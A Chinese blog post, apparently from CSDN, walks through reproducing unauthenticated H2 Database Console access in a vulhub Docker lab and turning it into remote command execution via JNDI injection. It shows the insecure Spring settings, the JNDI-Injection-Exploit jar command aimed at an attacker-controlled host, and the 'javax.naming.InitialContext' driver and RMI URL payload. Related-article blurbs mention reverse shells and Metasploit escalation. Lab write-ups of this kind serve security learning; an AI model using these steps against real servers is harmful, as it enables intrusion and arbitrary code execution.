H2 Database Console 未授权访问

最新推荐文章于 2023-01-06 14:28:01 发布
最新推荐文章于 2023-01-06 14:28:01 发布
阅读量3.8k 收藏
点赞数
分类专栏: 中间件漏洞复现 文章标签: spring 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111413979
版权

声明

好好学习,天天向上

漏洞描述

H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权:

spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true
利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。

影响范围

Spring Boot + H2

spring.h2.console.enabled=true

JDK < 6u201、7u191、8u182、11.0.1(LDAP)

复现过程

这里使用1.4.200版本

使用vulhub

cd /app/vulhub-master/h2database/h2-console-unacc

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,访问http://your-ip:8080/h2-console/

http://192.168.239.129:8080/h2-console/

kali搭建jndi的exp

参考如下链接,使用git拉去,maven编译

https://github.com/welk1n/JNDI-Injection-Exploit/#examples

编译好后,进入target目录,运行jar,我这以前weblogic的时候就弄好了(IP就是kali的IP,exp就用图中横线的rmi)

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/h2-db -A 192.168.239.139

在这里插入图片描述

再次回到WEB

Driver Class:填

javax.naming.InitialContext

JDBC URL填

rmi://192.168.239.139:1099/k1s9xm

在这里插入图片描述

在这里插入图片描述

查看,命令已经执行

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
H2 Database Console授权访问漏洞复现+利用
0xSec
04-08 1594
H2 database是一款Java内存数据库,多用于单元测试。利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。
【实战系列4】H2 Database Console授权访问/命令执行漏洞到msf内网提权渗透
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
04-13 1233
通过H2Database Console的命令执行漏洞,结合windows的powershell反弹shell,再利用msf提权并开启rdp服务,在管理员修改了默认的rdp端口3389的情况下,利用命令找到真正的rdp服务端口,远程连接控制目标主机。
spring-boot-h2-console:H2控制台的Spring Boot配置
05-01
spring-boot-h2-console 该项目的主要目标是展示如何为Spring Boot Web应用程序配置h2控制台。 参考: 前言 H2是测试期间内存数据库的理想选择,因为我们不必安装数据库。 在开发过程中,我们经常需要查看数据库内部以查看架构或数据。 在某些情况下,仅需要一个与内存数据库的连接。 这意味着要打开的数据库是私有的。 在这种情况下,数据库URL为jdbc:h2:mem: 备注:在同一虚拟机中打开两个连接意味着打开两个不同的(专用)数据库。 有时需要到同一内存数据库的多个连接。 在这种情况下,数据库URL必须包含一个名称。 示例: jdbc:h2:mem:db1 。 备注:使用此URL访问相同的数据库仅在相同的虚拟机和类加载器环境中有效。 配置 pom.xml <dependency> <groupId>com.h2database</groupId
SpringSecurity入门学习(2)整合MyBatis-Plus将用户存入数据库
Symon的博客
07-21 544
前面学习了Security简单的认证和授权,而我们使用的登录用户是在内存中或者配置文件中定义的,而实际项目中我们都是在数据库中定义用户,接下来我们开始学习如何将用户数据保存到数据库。 Security整合Mybatis-Plus将用户存入数据库 SpringSecurity支持多种不同的数据源,这些不同的数据源最终都将被封装成UserDetailsService的实例,可以自己封装,也可以使用系统默认提供的UserDetailsService实例,例如前面介绍的InMemoryUserDetailsMa
html经常犯的错误,最常犯的 HTML 标识错误 Top 100
weixin_39905226的博客
06-23 820
required attribute "alt" not specified, 1,392,075 times.& did not start a character reference. (& probably should have been escaped as &.), 764,450 times.end tag for "img" omitted, but OMI...
使用 JWT 和 H2 数据库的 Spring Boot 安全登录示例
allway2的博客
01-26 4160
Spring Boot Security Login example with JWT and H2 Database - BezKoderhttps://www.bezkoder.com/spring-boot-security-login-jwt/ 在本教程中,我们将构建一个 Spring Boot,Spring Security:登录和注册示例(Rest API),它支持 JWT 和 HttpOnly Cookie 与 H2 数据库一起使用。你会知道: 使用 JWT 和 HttpOnly Cook
H2 Database Console授权访问
zzzzz1284的博客
01-06 874
H2 Database Console授权访问
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接
qq_45234543的博客
11-23 2305
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接,docker授权漏洞利用,ssh密钥连接
H2:SpringBoot整合内存数据库
燕双嘤
04-23 1615
H2数据库是一种轻量级的、嵌入式的关系型数据库管理系统(RDBMS),它被设计用于嵌入到Java应用程序中。H2数据库以纯Java代码的形式实现,因此它不需要外部的数据库服务器或独立的进程来运行,可以直接作为Java类库嵌入到应用程序中,或者以服务器模式在网络上提供服务。
H2 Database Console 授权访问复现
锋刃科技的博客
01-22 2221
漏洞概述 H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。 环境搭建 使用vulhub来安装...
h2 database
07-24
the Java SQL database. The main features of H2 are: •Very fast, open source, JDBC API •Embedded and server modes; in-memory databases •Browser based Console application •Small footprint: ...
Android代码-h2database
08-06
More information: http://h2database.com Features H2 Derby HSQLDB MySQL PostgreSQL Pure Java Yes Yes Yes No No Memory Mode Yes Yes Yes No No Encrypted Database Yes Yes Yes No No ODBC ...
h2 database pdf
07-24
the Java SQL database. The main features of H2 are: •Very fast, open source, JDBC API •Embedded and server modes; in-memory databases •Browser based Console application •Small footprint: ...
从JDBC到h2 database任意命令执行1
08-03
然后,调其中的org.h2.tools.Server 类:可以看到所有的参数,我们使下这条命令启动 Web console,默认监听 8082 端:启动后直接访
xfire 用公司实际运行的模块做的一个试验!
02-13
用公司实际运行的模块做的一个试验,用于自已测试用的。觉得有用可以看下。 有问题加java 群83097537!
Java程序员用下班时间给学弟做了一个在线考试系统
IT邦德
12-17 4240
最近正好在带徒弟做项目,也有很多网友再问,能否个共享一些框架,所以整理了下 把最近部署上线的一套学Spring+SpringMVC+MyBatis的在线考试系统框架分享给各位网友
SpringSecurity学习笔记之 入门 十六 ( 基于JJWT 无状态会话管理的【前后端分离】)
m0_49194578的博客
08-26 2317
之前的项目都是基于session的会话,用户的信息数据储存在session中; 但是有两个弊端,1.session不是很安全,2.在分布式项目中session的管理是个问题; 所以尝试使用jjwt来解决问题 由于security原生支持的是session。所以改jwt我们就需要手动完成框架自动完成的部分; 手动加入过滤器,拦截请求进行token认证; 手动调用登录请求调用loadUser,进行登录认证; 手动完成用户Conext的创建,并设进线程域对象; 至于用户信息的管理: 直接在载荷里存入用户信息
Go代码规范
zero
10-26 1038
Go语言安全编码规范-翻译 英文地址 翻译:blood_zer0、Lingfighting 如果翻译的有问题:联系我(zer0zhang)。匆忙翻译肯定会有很多错误,欢迎大家一起讨论Go语言安全能力建设。 介绍 Go语言-Web应用程序安全编码实践是为了给任何使用Go进行编程与Web开发的人员提供指导。 这本书是Checkmarx安全研究团队共同努力的结晶,它遵循OWASP安全编码实践快速参考指南。 这本书主要的目的是为了帮助开发人员避免常见错误,同时通过"实践方法"学习编程语言心得。本书提供了关于"如
2020年通过Django&React完成110%的JWT身份验证-2020年
编程故事的地方
02-22 861
ReactJS是一个很棒的前端框架,而Django是一个很棒的后端框架。 但是,像往常一样,在处理琐碎的琐碎事情时,很难将两者很好地放在一起。 这不像将香蕉贴在墙上。 这是一个中级教程,超出了大多数教程的内容,以使Django和React一起工作。 我不仅要在这里给您留下一张不完整的图片。 这就是整个shebang。 克服它并构建有用的东西。 当我们第一次为我的初创公司Lollipop.a...
springboot h2 mysql
最新发布
06-09
你想问的可能是如何在Spring Boot应用程序中同时使用H2和MySQL数据库。在开发阶段,我们通常会使用H2数据库,而在生产环境中则会使用MySQL数据库。 首先,需要在pom.xml文件中添加MySQL数据库和H2数据库的依赖。 ```xml <dependency> <groupId>com.h2database</groupId> <artifactId>h2</artifactId> <scope>runtime</scope> </dependency> <dependency> <groupId>mysql</groupId> <artifactId>mysql-connector-java</artifactId> </dependency> ``` 然后在application.properties文件中添加以下配置: ```properties # H2 Database Configuration spring.h2.console.enabled=true spring.h2.console.path=/h2 spring.datasource.url=jdbc:h2:mem:testdb # MySQL Database Configuration spring.datasource.driver-class-name=com.mysql.jdbc.Driver spring.datasource.url=jdbc:mysql://localhost:3306/testdb spring.datasource.username=root spring.datasource.password=password ``` 以上配置将启用H2控制台,将H2数据库的URL设置为内存中的testdb,以及将MySQL数据库的URL设置为localhost:3306/testdb。 在开发期间,可以使用H2数据库,而在生产环境中,则可以使用MySQL数据库。 同时使用H2和MySQL数据库的好处是可以在开发期间快速迭代和测试,而在生产中则可以使用可靠的MySQL数据库。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值